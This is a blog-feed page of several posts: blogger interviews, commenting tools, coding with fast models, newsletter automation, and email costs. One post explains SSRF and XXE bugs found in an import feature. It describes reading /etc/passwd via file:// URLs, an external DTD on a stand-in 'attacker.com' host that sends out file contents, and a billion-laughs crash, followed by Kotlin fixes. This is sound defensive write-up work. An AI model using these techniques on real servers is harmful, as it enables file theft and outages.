Posts in Html (20 found)
Kix Panganiban 2 days ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments -- but I'm not a huge fan of either of them: Then I realized that there's a great alternative that I've used in the past: utteranc.es . Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to Github Issues in a Github repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below: Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine but I prefer something that looks a little neater. Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have 1 Komments page per blog post, or even 1 Komments page for your entire blog.

0 views
Manuel Moreale 2 days ago

Karen

This week on the People and Blogs series we have an interview with Karen, whose blog can be found at chronosaur.us . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Pete Millspaugh and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hello! My name is Karen. I work in IT support for a large company’s legal department, and am currently working on my Bachelors in Cybersecurity and Information Assurance. I live near New Orleans, Louisiana, with my husband and two dogs - Daisy, A Pembroke Welsh Corgi, and Mia, a Chihuahua. Daisy is The Most Serious Corgi ever (tm), and Mia has the personality of an old lady who chain smokes, plays Bingo every week at the rec center, and still records her soap operas on a VHS daily. My husband is an avid maker (woodworking and 3D printing, mostly), video gamer, and has an extensive collection of board games that takes up the entire back wall of our livingroom. As for me, outside of work, I’m a huge camera nerd and photographer. I love film photography, and recently learned how to develop my own negatives at home! I also do digital - I will never turn my nose up at one versus the other. I’ve always been into assorted fandoms, and used to volunteer at local sci-fi/fantasy/comic conventions up to a few years ago. I got into K-Pop back in 2022, and am now an active participant in the local New Orleans fan community, providing Instax photo booth services for events. I’ve also hosted K-Pop events here in NOLA as well. My ult K-Pop group is ATEEZ, but I’m a proud multi fan and listen to whatever groups or music catch my attention, including Stray Kids, SHINee, and Mamamoo. I also love 80s and 90s alternative, mainly Depeche Mode, Nine Inch Nails, and Garbage. And yes, I may be named Karen but I refuse to BE a “Karen”. I don’t get upset when people use the term, I find it hilarious. So I have been blogging off and on since 2001 or so - back when they were still called “weblogs” and “online journals”. Originally, I was using LiveJournal, but even with a paid account, I wanted to learn more customization and make a site that was truly my own. My husband - then boyfriend - had their own server, and gave me some space on it. I started out creating sites in Microsoft Frontpage and Dreamweaver (BEFORE Adobe owned them!), and moved to using Greymatter blog software, which I loved and miss dearly. I moved to Wordpress in - 2004 maybe? - and used that for all my personal sites until 2024. I’d been reading more and more about the Indieweb for a while and found Bear , and I loved the simplicity. I’ve had sites ranging from a basic daily online journal, to a fashion blog, to a food blog, to a K-Pop and fandom-centric blog, to what it is today - my online space for everything and anything I like. I taught myself HTML and CSS in order to customize and create my sites. No classes, no courses, no books, no certifications, just Google and looking at other people’s sites to see what I liked and how they did it. My previous job before this one, I was a web administrator for a local marketing company that built sites using DNN and Wordpress, and I’m proud to say that I got that job and my current one with my self-developed skills and being willing to learn and grow. I would not be where I am today, professionally, if it wasn’t for blogging. I’ll be totally honest - I don’t have a writing process. I get inspiration from random thoughts, seeing things online, wanting to share the day-to-day of my life. I don’t draft or have someone proof read, I just type out what I feel like writing. When I had blogs focusing on specific things - plus size fashion and K-Pop, respectively - I kept a list of topics and ideas to refer back to when I was stuck for ideas. That was when I was really focused on playing the SEO and search engine algorithm game, though, where I was trying to stick to the “two-three posts a week” rule in an attempt to boost my search engine results. I don’t do that now. I do still have a list of ideas on my phone, but it’s nothing I am feeling FORCED to stick to. It’s more along the lines of that I had an idea while I was out, and wanted to note it so I don’t forget. Memory is a fickle thing in your late 40s, LOL. My space absolutely influences my mindset for writing. I prefer to write in the early morning, because my brain operates best then. (I know I am an exception to the rule by being an early bird.) I love weekend mornings when I can get up really early and settle into my recliner with my laptop and coffee, and just listen to some lofi music and just feel topics and ideas out. I also made my office/guest bedroom into a cozy little space, with a daybed full of soft blankets and fluffy pillows and cushions, and a lap desk. In all honesty, my preferred location to write is at a coffeeshop first thing in the morning. I love sitting tucked in a booth with a coffee and muffin, headphones on and listening to music, when the sun is just on the cusp of rising and the shop is still a little too chilly. That’s when the creative ideas light up the brightest and the synapses are firing on all cylinders. Currently, my site is hosted on Bear . I used to be a self-hosted Wordpress devotee, but in mid-late 2024, I got really tired of the bloat that the apps had become. In order to use it efficiently for me, I had to install entirely too many plugins to make it “simpler”. (Shout-out to the Indieweb Wordpress team, though - they work so hard on those plugins!) Of course, the more plugins you have, the less secure your site… My domain is registered through Hostinger . To write my posts, I use Bear Markdown Notes. I heard about this program after seeing a few others talking about using it for drafts, notes, etc. I honestly don’t think I’d change much! I really love using Bear Blog. It reminds me of the very old school LiveJournal days, or when I used Greymatter. It takes me back to the web being simpler, more straightforward, more fun. I also like Bear’s manifesto , and that he built the service for longevity . I would probably structure my site differently, especially after seeing some personal sites set up with more of a “digital garden” format. I will eventually adjust my site at some point, but for now, I’m fine with it. (That and between school and work, it’s kind of low on the priority list.) I purchased a lifetime subscription to Bear after a week of using it, which ran around $200 - I don’t remember exactly. I knew that I was going to be using the service for a while and thought I should invest in a place that I believed in. My Hostinger domain renewals run around $8.99 annually. My blog is just my personal site - I don’t generate any revenue or monetise in any way. I don’t mind when people monetize their site - it’s their site and they can do what they choose. As long as it’s not invading others’ privacy or harmful, I have absolutely no issue. Make that money however you like. Ooooh I have three really good suggestions for both checking out and interviewing! Binary Digit - B is kind of an influence for me to play with my site again. They have just this super cool and early 2000s vibe and style that I really love. Their site reminds me of me when I first started blogging, when I was learning new things and implementing what I thought was cool on my site, joining fanlistings, making new online friends. Kevin Spencer - I love Kevin’s writing and especially his photography. Not only that, he has fantastic taste in music. I’ve left many a comment on his site about 80s and 90s synthpop and industrial music. A Parenthetical Departure - Sylvia was one of the first sites I started reading when I started looking up info on Bear Blog. They are EXTREMELY talented and have an excellent knack for playing with design, and showing others how it works. One of my side projects is Burn Like A Flame , which is my local K-pop and fandom photography site. I actualy just started a project there that is more than slightly based on People and Blogs - The Fandom Story Project . I’m interviewing local fans to talk about what they love and what their feelings are on fandom culture now, and I’m accompanying that with a photoshoot with that person. It’s a way to introduce people to each other within the community. Two of my favorite YouTube channels that I have recently been watching are focused on fashion discussion and history - Bliss Foster and understitch, . If you like learning and listening to information on fashion, I highly recommend these creators. I know a TON of people have now seen K-Pop Demon Hunters (which I love, and the movie has a great message for not only kids, but adults). If you’ve seen this and are interested in getting into K-Pop, I suggest checking out my favorite group, ATEEZ. If you think that most K-Pop is all chirpy bubbly cutesy songs, let me suggest two by this group that aren’t what you’d expect: Guerrilla and Turbulence . I strongly suggesting watching without the translations, and then watching again with them. Their lyrics are the thing that really drew me into this group, and had me learning more about the deeper meaning behind a lot of K-Pop songs. And finally, THANK YOU to Manu for People and Blogs! I always find some really great new sites to check out after reading these interviews, and I am truly honored to be asked to join this list of great bloggers. It’s inspiring me to work harder on my blog and to post more often. Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 117 interviews . Make sure to also say thank you to Benny and the other 127 supporters for making this series possible.

0 views
Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Kix Panganiban 4 days ago

First make it fast, then make it smart

In the speed vs. intelligence spectrum, I've always figured the smarter AI models would outperform faster ones in all but the most niche cases. On paper and in benchmarks, that often holds true. But I've learned -- at least for me personally -- that faster models bring way more utility to the table. Man, I hate the word "agentic." I find it to be trendy and pretentious, but "AI-assisted coding" is a mouthful with too many syllables, so I'll begrudgingly stick with "agentic" coding for now. When it comes to agentic coding, the instinct is to pick a smart model that can make clever changes to your code. You know, the kind that thinks out loud, noodles on an idea for a bit, then writes code and stares at it for a bit. On the surface, that seems like the way to go -- but for me, it's often a productivity killer. I've got ADHD, and even on meds, my attention span is flaky at best. Waiting for a model to "think" while it performs a task makes me lose focus on what it's even doing. (This is also why I don't believe in running agents in parallel, or huge plan-think-execute loops like what Google Antigravity does). My brain wanders off, and by the time the model's done, I've got to context-switch back to review its work. Then I ask for changes, wait again, and repeat the cycle. It's slow, painfully boring, and doesn't even guarantee I'll get what I want. Those little dead-air moments are what ruin it for me. I took a break from agentic coding for a while and went back to writing code by hand. No waiting, no boredom, and I always got exactly what I needed (usually). But then I realized something -- not all coding tasks need deep thought. My buddy Alex likes to call them "leaf node edits": small, trivial changes that are more mechanical than cerebral. Think splitting functions, renaming stuff (when doesn't cut it), or writing HTML and Markdown. These are perfect to delegate to AI because failing at tasks like these are rarely consequential, and mistakes are easier to spot. I think the trick really here is to not rely on AI to think or make architectural or design decisions. Do the planning and heavy lifting yourself; just use the tool for fast, broad-sweeping autocomplete. It's less like hiring a programmer and more like extending your typing speed. I once wrote about how Dumb Cursor is the best Cursor and that Cursor peaked with its first Composer release (I don't know why they chose to name two distinctly different features the same, but who knows anything these days). I take it all back. Composer is back with a vengeance, and it's fast . Aggressively fine-tuned for parallel tool calling, it flies through making changes -- even if it's not that smart. It makes silly mistakes and sometimes spits out vibe-codey slop (think: too many inline comments, ignoring , or overusing where it's not needed) -- but because it's so dang quick , it's a joy to use. For those leaf node edits, speed beats smarts every time. I've also tinkered with other fast models like Gemini Flash. It's cheap and decently smart, but it's just too unreliable for me. Google's API endpoints randomly conk out, I've found that it struggles with tool calling, and it'll hallucinate if you stuff too much into its context (which it touts as obnoxiously large). I'm sure there are workarounds -- but I don't want to fuss with it. My goal with agentic coding is low-friction help, not a side project to debug the tool itself. Then there are superfast inference providers like Cerebras , Sambanova , and Groq . They let you run open-weight, smart models (think Qwen or Kimi) at lightning speed. If I weren't already using Cursor, I'd probably go back to Roo or Crush with these. I just don't want to be managing multiple providers, API keys, and strict rate limiting -- it feels like a hassle, kinda defeating the purpose of a fast model. At the end of the day, my brain craves tools that keep up with me, not ones that make me wait. Faster models might not be the smartest, but for leaf node edits and mechanical tasks, I find them to be much more palatable. I'd rather iterate quickly and fix small goofs than sit through a slow model's deep thoughts. Turns out, speed isn't just a feature for me -- it's a necessity.

0 views
Manuel Moreale 1 weeks ago

Alexandra Wolfe

This week on the People and Blogs series we have an interview with Alexandra Wolfe, whose blog can be found at wrywriter.ca . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Piet Terheyden and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. I’m a viviparous, mammalian, carbon-based biped — a veritable fossil from a bygone age sometimes referred to as the Good Old Days. Though, to be honest, that’s debatable to the nth degree. I was born in Germany to British parents and moved across the planet every 2-3 years, all of which seemed very natural to me at the time. Apart from studying for 3 degrees (I never finished any of them) I did several years in the military ostensibly as an air traffic controller. I then somehow stumbled from there into the print & publishing trade and made a comfortable living working on books and magazines. I even rubbed shoulders with a few names over the years, which in and of itself, was pleasantly entertaining. Being in the publishing trade allowed me to indulge in a number of my fav hobbies, including publishing a couple of scifi ezines over the years, run a Star Trek club, hang out at several scifi and comic cons, and meet the stars and writers of many of my fav scifi shows. I still have the photographic evidence to prove it. I didn’t so much as decide to blog as stumble into it, like many back in the days of LiveJournal and MySpace, we all just followed the crowd. It then seemed logical (at the time) to upgrade from a MySpace account to bumbling around with HTML creating a static website that was then quickly superseded by me creating an official ‘Blog’. At that point I was using the then new Wordpress software. It was, for me at least, revolutionary. Suddenly, everyone was blogging about everything. It’s at that point I think I bought my first domain name: wrywriter and used the dot com version till right up till a few years ago when I added the dot ca version and, sadly, let the dot com version lapse. Though now, I wish I had kept it. Now, I still have the name, but have moved away from Wordpress and blog ‘lightly’ using Bear Blog and Micro Blog to scribble and share my thoughts on. Clean, small, simple and more focused on the actual writing and less on the tweaking and tinkering. Both platforms suit my current needs. I’m not sure I have a process per se. I don’t plan posts, and don’t jot down ideas. I’m more of a pantster, I stare at the blinking cursor only when I feel like I have something to say. Whether that be some random thought I had over breakfast, a news item I want to respond to, or a response to someone else’s post. I don’t do research, or make drafts, or have endless notebooks full of ideas. Unless we’re talking about short stories or ideas for novels. Blogging, for me, is more about spontaneity. I would have to say that physical space can and probably does influence how anyone writes. And that we all have our own particular quirks and eccentricities when it comes to our writing environment. I like mine to be quiet, clean, and minimal. There are a few toys I have at hand I play with, but other than that, it’s me and the keyboard, and a large screen. You’re asking a dinosaur who somehow lived long enough to stumble into a Jetson’s future what my Tech Stack is? Excuse me while I consult someone smarter than I am about what a tech stake might look like. Oh, you mean where did I buy my domain name and that sort of thing? I want to say Porkbun because I just love saying Porkbun. But no such luck, I sourced my domains here, in Canada, with WHC.ca and, at one time I had hosting with them, that is, till they kept putting their prices up. I also got very disillusioned by Wordpress so moved full time to Bear Blog and Micro Blog. I use Bear for more long form rambling posts and post my daily thoughts over on m.b. which is more suited to sharing said drivel on social media. I find this a bit of an odd question, my experience is based on what I went through, that ‘living’ experience of places and spaces that no longer exist, so of course, in the here and now, it would all be different. I would probably start off with a simple blog on Bear or the Pika platform and skip the likes of Blogger and Wordpress altogether. The web might be obsessed with money, but I’d say most bloggers are not. I’m not interested in monetising my blog, nor am I interested in reading blogs that are focused on making money. I avoid them like the plague. If someone quietly, and respectfully asks me to support their writing, however, with a discrete ‘Buy Me A Coffee’ button, then I’m almost always happy to make a donation. There are so many great blogs about at the moment, but some of my current fav reads are: I would humbly suggest you ask David Johnson of Crossing The Threshold for an interview. David lives in Hawaii and always has some thoughtful posts to read on his blog. There are many things I’m always working on when it comes to writing projects. I do love to scribble. You can find more over on Alexandra Wolfe (alexandrawolfe.ca) and read my daily posts over on the Wry Writer (wrywriter.ca). For those of you out there who love reading fantasy, I stumbled upon a great series by Robert Jackson Bennet starting with, The Tainted Cup and followed by A Drop Of Corruption. I sincerely hope there’s more in the series. Some fun websites people might like to check out: And finally, I would like to extend a big thank you to Robert Birming for suggesting me to join in this amazing series, People & Blogs, and an even bigger thank you to you, Manu, for asking me to take part. I feel honoured to be among such an esteemed alumni. Much love, Alex Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 116 interviews . Make sure to also say thank you to Chuck Grimmett and the other 124 supporters for making this series possible. David at www.crossingthethreshold.net Sylvia at sylvia.buzz David at forkingmad.blog Kimberly at kimberlykg.com Robert at robertbirming.com Annie at anniemueller.com My life in Weeks weeks.ginatrapani.org Notebook of Ghosts notebookofghosts.com Shady Characters shadycharacters.co.uk

0 views

Automating agentic development

This week, I visited my friends at 2389 in Chicago. These are the folks who took my journal plugin for Claude Code and ran with the idea, creating botboard.biz , a social media platform for your team's coding agents. They also put together an actual research paper proving that both tools improve coding outcomes and reduce costs. Harper is one of the folks behind 2389...and the person who first suggested to me that maybe I could do something about our coding agents' propensity for saying things like: His initial suggestion was that maybe I could make a single-key keyboard that just sends Back in May, I made one of those . When I added keyboard support to the Easy button, I made sure not to disable the speaker. So it helpfully exclaimed "That was easy!" every time it sent: But...you still had to press the button. I'm pretty sure the button got used for at least a day before it was...retired. But the problem it was designed to solve is very, very real. And pretty frustrating. Yesterday morning, sitting in 2389's offices, we spent a bunch of time talking about automating ourselves out of a job. In that spirit, I finally dug enough into Claude Code hooks to build out the first version of Double Shot Latte , a Claude Code plugin that, hopefully, makes a thing of the past. DSL is implemented as a Claude Code "Stop" hook. Any time Claude thinks it should stop and ask for human interaction, it first runs this hook. The hook hands off the last couple of messages to another instance of Claude with a prompt asking it to judge whether Claude genuinely needs the human's help or whether it's just craving attention. It tries to err on the side of pushing Claude to keep working. To try to avoid situations where it misjudges Claude's ability to keep working without guidance, it bails out if Claude tries to stop three times in five minutes. Testing DSL was...a little bit tricky. I needed to find situations where Claude would work for a bit and then stop and ask for my approval to keep working. Naturally, I asked Claude for test scenarios. The first was "build a full ecommerce platform." Claude cranked for about 20 minutes before stopping. I thought the judge agent hadn't worked, but...Claude had actually fulfilled the entire spec and built out an ecommerce platform. (The actual implementation was nothing to write home about, but I'm genuinely not sure what it could have done next without a little more direction. The second attempt fared no better. On Claude's advice, I asked another Claude to build out an HTML widget toolkit. Once again, it cranked for a while. It built widgets. It wrote tests. It wrote a Storybook. And when it stopped for the first time...I couldn't actually fault it. Slightly unsure how to test things, I put this all aside for a bit to work on another project. I opened up Claude Code and typed Claude greeted me like it normally does. And instead of stopping there like it usually would, it noticed that there were uncommitted files in my working directory and started to dig through each of them trying to reverse engineer the current project. Success! (I hit to stop it so that I could tell it what I actually wanted.) Double Shot Latte will absolutely burn more tokens than you're burning now. You might want to think twice about using it unsupervised. If you want to put Claude Code into turbo mode, DSL is available on the Superpowers marketplace . If you don't yet have the Superpowers marketplace set up, you'll need to do that before you can install Double Shot Latte: Once you do have the marketplace installed, run this command inside Claude Code: Then, restart Claude Code so it can pick up the new hook.

0 views
Simon Willison 1 weeks ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack. The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: That's the whole process! The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me. The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective: My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application . I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this : That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin: As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post. Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example. Blocks of preformatted text often have an extra blank line at the end, which I remove. Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more. I pick the featured image for the newsletter and add some tags.

0 views
iDiallo 1 weeks ago

How Do You Send an Email?

It's been over a year and I didn't receive a single notification email from my web-server. It could either mean that my $6 VPS is amazing and hasn't gone down once this past year. Or it could mean that my health check service has gone down. Well this year, I have received emails from readers to tell me my website was down. So after doing some digging, I discovered that my health checker works just fine, but all emails it sends are being rejected by gmail. Unless you use a third party service, you have little to no chance of sending an email that gets delivered. Every year, email services seem to become a tad bit more expensive. When I first started this website, sending emails to my subscribers was free on Mailchimp. Now it costs $45 a month. On Buttondown, as of this writing, it costs $29 a month. What are they doing that costs so much? It seems like sending emails is impossibly hard, something you can almost never do yourself. You have to rely on established services if you want any guarantee that your email will be delivered. But is it really that complicated? Emails, just like websites, use a basic communication protocol to function. For you to land on this website, your browser somehow communicated with my web server, did some negotiating, and then my server sent HTML data that your browser rendered on the page. But what about email? Is the process any different? The short answer is no. Email and the web work in remarkably similar fashion. Here's the short version: In order to send me an email, your email client takes the email address you provide, connects to my server, does some negotiating, and then my server accepts the email content you intended to send and saves it. My email client will then take that saved content and notify me that I have a new message from you. That's it. That's how email works. So what's the big fuss about? Why are email services charging $45 just to send ~1,500 emails? Why is it so expensive, while I can serve millions of requests a day on my web server for a fraction of the cost? The short answer is spam . But before we get to spam, let's get into the details I've omitted from the examples above. The negotiations. How similar email and web traffic really are? When you type a URL into your browser and hit enter, here's what happens: The entire exchange is direct, simple, and happens in milliseconds. Now let's look at email. The process is similar: Both HTTP and email use DNS to find servers, establish TCP connections, exchange data using text-based protocols, and deliver content to the end user. They're built on the same fundamental internet technologies. So if email is just as simple as serving a website, why does it cost so much more? The answer lies in a problem that both systems share but handle very differently. Unwanted third-party writes. Both web servers and email servers allow outside parties to send them data. Web servers accept form submissions, comments, API requests, and user-generated content. Email servers accept messages from any other email server on the internet. In both cases, this openness creates an opportunity for abuse. Spam isn't unique to email, it's everywhere. My blog used to get around 6,000 spam comments on a daily basis. On the greater internet, you will see spam comments on blogs, spam account registrations, spam API calls, spam form submissions, and yes, spam emails. The main difference is visibility. When spam protection works well, it's invisible. You visit websites every day without realizing that behind the scenes. CAPTCHAs are blocking bot submissions, rate limiters are rejecting suspicious traffic, and content filters are catching spam comments before they're published. You don't get to see the thousands of spam attempts that happen every day on my blog, because of some filtering I've implemented. On a well run web-server, the work is invisible. The same is true for email. A well-run email server silently: There is a massive amount of spam. In fact, spam accounts for roughly 45-50% of all email traffic globally . But when the system works, you simply don't see it. If we can combat spam on the web without charging exorbitant fees, email spam shouldn't be that different. The technical challenges are very similar. Yet a basic web server on a $5/month VPS can handle millions of requests with minimal spam-fighting overhead. Meanwhile, sending 1,500 emails costs $29-45 per month through commercial services. The difference isn't purely technical. It's about reputation, deliverability networks, and the ecosystem that has evolved around email. Email providers have created a cartel-like system where your ability to reach inboxes depends on your server's reputation, which is nearly impossible to establish as a newcomer. They've turned a technical problem (spam) into a business moat. And we're all paying for it. Email isn't inherently more complex or expensive than web hosting. Both the protocols and the infrastructure are similar, and the spam problem exists in both domains. The cost difference is mostly artificial. It's the result of an ecosystem that has consolidated around a few major providers who control deliverability. It doesn't help that Intuit owns Mailchimp now. Understanding this doesn't necessarily change the fact that you'll probably still need to pay for email services if you want reliable delivery. But it should make you question whether that $45 monthly bill is really justified by the technical costs involved. Or whether it's just the price of admission to a gatekept system. DNS Lookup : Your browser asks a DNS server, "What's the IP address for this domain?" The DNS server responds with something like . Connection : Your browser establishes a TCP connection with that IP address on port 80 (HTTP) or port 443 (HTTPS). Request : Your browser sends an HTTP request: "GET /blog-post HTTP/1.1" Response : My web server processes the request and sends back the HTML, CSS, and JavaScript that make up the page. Rendering : Your browser receives this data and renders it on your screen. DNS Lookup : Your email client takes my email address ( ) and asks a DNS server, "What's the mail server for example.com?" The DNS server responds with an MX (Mail Exchange) record pointing to my mail server's address. Connection : Your email client (or your email provider's server) establishes a TCP connection with my mail server on port 25 (SMTP) or port 587 (for authenticated SMTP). Negotiation (SMTP) : Your server says "HELO, I have a message for [email protected]." My server responds: "OK, send it." Transfer : Your server sends the email content, headers, body, attachments, using the Simple Mail Transfer Protocol (SMTP). Storage : My mail server accepts the message and stores it in my mailbox, which can be a simple text file on the server. Retrieval : Later, when I open my email client, it connects to my server using IMAP (port 993) or POP3 (port 110) and asks, "Any new messages?" My server responds with your email, and my client displays it. Checks sender reputation against blacklists Validates SPF, DKIM, and DMARC records Scans message content for spam signatures Filters out malicious attachments Quarantines suspicious senders Both require reputation systems Both need content filtering Both face distributed abuse Both require infrastructure to handle high volume

0 views
Max Woolf 2 weeks ago

Nano Banana can be prompt engineered for extremely nuanced AI image generation

